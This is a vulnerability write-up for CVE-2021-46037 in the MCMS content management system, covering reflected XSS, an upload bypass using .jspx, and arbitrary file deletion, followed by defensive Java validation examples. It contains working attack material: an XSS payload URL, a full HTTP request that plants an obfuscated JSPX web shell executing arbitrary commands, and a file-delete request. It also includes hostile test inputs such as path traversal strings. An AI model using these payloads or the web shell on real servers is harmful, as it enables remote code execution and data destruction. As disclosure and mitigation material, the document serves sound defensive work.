CVE-2021-46037: MCMS vulnerabilities
MCMS v5.2.4 was discovered to contain an arbitrary file deletion vulnerability via the component /template/unzip.do.
An open source CMS project: https://github.com/ming-soft/MCMS
The MCMS vulnerabilities include:
- Reflected XSS
- Unauthorized file upload
- Authorized file delete
Reproduce: XSS
Path /ms/template/unzip.do has a reflected XSS.
Payload:
/ms/template/unZip.do?fileUrl=%3C/p%3E%3Cimg%20src=x%20onerror=alert(%27hacking%27)%3E
Authorized file upload
Path /ms/file/uploadTemplate.do
Requires login: get the Cookie, then upload the file.
Unauthorized file upload to RCE
Path /file/upload
As the picture above shows, an attacker can upload a .jspx file to the server without any identity verification, and even when the project is packaged as a WAR and deployed in Tomcat, a web shell on the server can be obtained.
The system filters the suffix .jsp, but .jspx can still be used to bypass it.
Payload:
POST /file/upload.do HTTP/1.1
Host: 192.168.100.103:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------124088951720288539841514905041
Content-Length: 1393
Origin: http://192.168.100.103:8080
Connection: keep-alive
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="uploadPath"
/
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="isRename"
false
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="appId"
false
-----------------------------124088951720288539841514905041
Content-Disposition: form-data; name="file"; filename="shell.jspx"
Content-Type: image/png
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter(“cmd”)!=null){
BASE64Decoder decoder = new BASE64Decoder();
Class rt = Class.forName(new String(decoder.decodeBuffer(“amF2YS5sYW5nLlJ1bnRpbWU=”)));
Process e = (Process)
rt.getMethod(new String(decoder.decodeBuffer(“ZXhlYw==”)), String.class).invoke(rt.getMethod(new
String(decoder.decodeBuffer(“Z2V0UnVudGltZQ==”))).invoke(null, new
Object[]{}), request.getParameter(“cmd”) );
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print(“<pre>”);
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print(“</pre>”);
}
%>
-----------------------------124088951720288539841514905041–
Source: net/mingsoft/basic/action/ManageFileAction.java
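The upload bypass above works because a suffix denylist only blocks the exact string ".jsp", so ".jspx" (which Tomcat also compiles as a JSP document) slips through. The following is an added example, not MCMS code: a small illustrative denylist of the kind the writeup describes placed next to an allowlist check that strips client-supplied directory parts, lower-cases the name, and requires every extension segment to be on the allowed list. The class name, the allowed extension set and the sample filenames are assumptions chosen for the demonstration.

```java
import java.util.Locale;
import java.util.Set;

// Added example (not part of MCMS): filename validation for a multipart upload.
public final class UploadNameCheck {

    // Assumption: this deployment only needs image, PDF and zip uploads.
    private static final Set<String> ALLOWED_EXTENSIONS =
            Set.of("png", "jpg", "jpeg", "gif", "pdf", "zip");

    // Illustrative denylist of the kind the writeup describes: only ".jsp" is
    // blocked, so "shell.jspx" passes. This is not MCMS's actual code.
    public static boolean passesJspDenylist(String clientFilename) {
        return clientFilename != null
                && !clientFilename.toLowerCase(Locale.ROOT).endsWith(".jsp");
    }

    // Allowlist check: true only if the name is clean and every extension
    // segment is permitted, so "shell.jspx", "shell.png.jspx" and
    // "shell.jspx.png" are all rejected.
    public static boolean isAllowedFilename(String clientFilename) {
        if (clientFilename == null || clientFilename.isEmpty()) return false;

        // Drop any directory component the client supplied ("../x.png", "C:\x.png").
        String base = clientFilename.replace('\\', '/');
        base = base.substring(base.lastIndexOf('/') + 1);

        // Reject control characters and null bytes, which confuse some filesystems.
        for (char c : base.toCharArray()) {
            if (c < 0x20 || c == 0x7f) return false;
        }

        String lower = base.toLowerCase(Locale.ROOT);
        int dot = lower.indexOf('.');
        // Must have a non-empty name and a non-empty extension.
        if (dot <= 0 || dot == lower.length() - 1) return false;

        // Check every segment after the first dot, not just the last one.
        for (String part : lower.substring(dot + 1).split("\\.")) {
            if (!ALLOWED_EXTENSIONS.contains(part)) return false;
        }
        return true;
    }

    public static void main(String[] args) {
        // Constructed sample filenames for the demonstration.
        String[] names = {"logo.png", "shell.jspx", "shell.jsp",
                "shell.png.jspx", "shell.jspx.png", "../../x.png", "x.PNG"};
        for (String n : names) {
            System.out.printf("%-16s denylist=%-5s allowlist=%s%n",
                    n, passesJspDenylist(n), isAllowedFilename(n));
        }
    }
}
```

The allowlist check only decides whether the name is acceptable; the server should still store the file under a name it generates itself and outside any directory the servlet container will compile or execute.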
Authorized file delete
Source: net/mingsoft/basic/action/TemplateAction.java
Payload:
GET /ms/template/unZip.do?fileUrl=HACKED HTTP/1.1
Host: 192.168.100.103:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://192.168.100.103:8080/ms/template/index.do?
Cookie: JSESSIONID=56EC9CCC14E1E8DEE4AACCF732EA7FC7; pageno_cookie=1
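Both findings on the unZip.do endpoint come from the same parameter: fileUrl is used as a filesystem path (the arbitrary deletion) and reflected back into the page unescaped (the reflected XSS). The following is an added example, not MCMS code, showing how a handler can confine a client-supplied path to a fixed template directory before acting on it, and HTML-escape the value before echoing it. The class name, the template-root layout and the sample inputs are assumptions made for the demonstration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

// Added example (not part of MCMS): confine a client-supplied path to one root
// and escape it before reflecting it in a response.
public final class ConfinedTemplateDelete {
    private final Path root;

    // Assumption: all template archives live under one directory.
    public ConfinedTemplateDelete(Path templateRoot) throws IOException {
        this.root = templateRoot.toRealPath();
    }

    // Resolve the client path under the root and refuse anything that escapes it,
    // including absolute paths, "../" sequences and symlinks planted inside the root.
    public Path resolveInside(String clientPath) throws IOException {
        if (clientPath == null || clientPath.isEmpty()) throw new IOException("empty path");
        if (clientPath.indexOf('\0') >= 0) throw new IOException("null byte in path");
        Path candidate = root.resolve(clientPath).normalize();
        if (!candidate.startsWith(root)) throw new IOException("path escapes template root");
        Path real = candidate.toRealPath(); // throws if the file does not exist
        if (!real.startsWith(root)) throw new IOException("symlink escapes template root");
        return real;
    }

    // Delete only a regular .zip file that lives inside the template root.
    public boolean deleteTemplateArchive(String clientPath) throws IOException {
        Path target = resolveInside(clientPath);
        if (!Files.isRegularFile(target)
                || !target.getFileName().toString().endsWith(".zip")) {
            return false;
        }
        return Files.deleteIfExists(target);
    }

    // Minimal HTML escaping for text placed into an HTML body or attribute.
    public static String htmlEscape(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&': sb.append("&amp;"); break;
                case '<': sb.append("&lt;"); break;
                case '>': sb.append("&gt;"); break;
                case '"': sb.append("&quot;"); break;
                case '\'': sb.append("&#39;"); break;
                default: sb.append(c);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) throws IOException {
        // Constructed test layout: a temp directory with one archive in it.
        Path tmp = Files.createTempDirectory("templates");
        Files.createFile(tmp.resolve("site.zip"));
        ConfinedTemplateDelete d = new ConfinedTemplateDelete(tmp);

        System.out.println("delete site.zip -> " + d.deleteTemplateArchive("site.zip"));

        // Constructed hostile inputs; each is reported with the value escaped,
        // which is what the response body should do instead of echoing it raw.
        String[] bad = {"../../etc/passwd", "/etc/passwd", "<img src=x onerror=alert(1)>"};
        for (String b : bad) {
            try {
                d.deleteTemplateArchive(b);
                System.out.println("accepted " + htmlEscape(b));
            } catch (IOException e) {
                System.out.println("rejected " + htmlEscape(b) + ": " + e.getMessage());
            }
        }
    }
}
```

Checking `startsWith(root)` after both `normalize()` and `toRealPath()` matters: the first catches textual traversal before touching the disk, the second catches a symlink that already sits inside the root but points outside it. Escaping at output time is what prevents the reflected payload from rendering, independent of whatever the path check does.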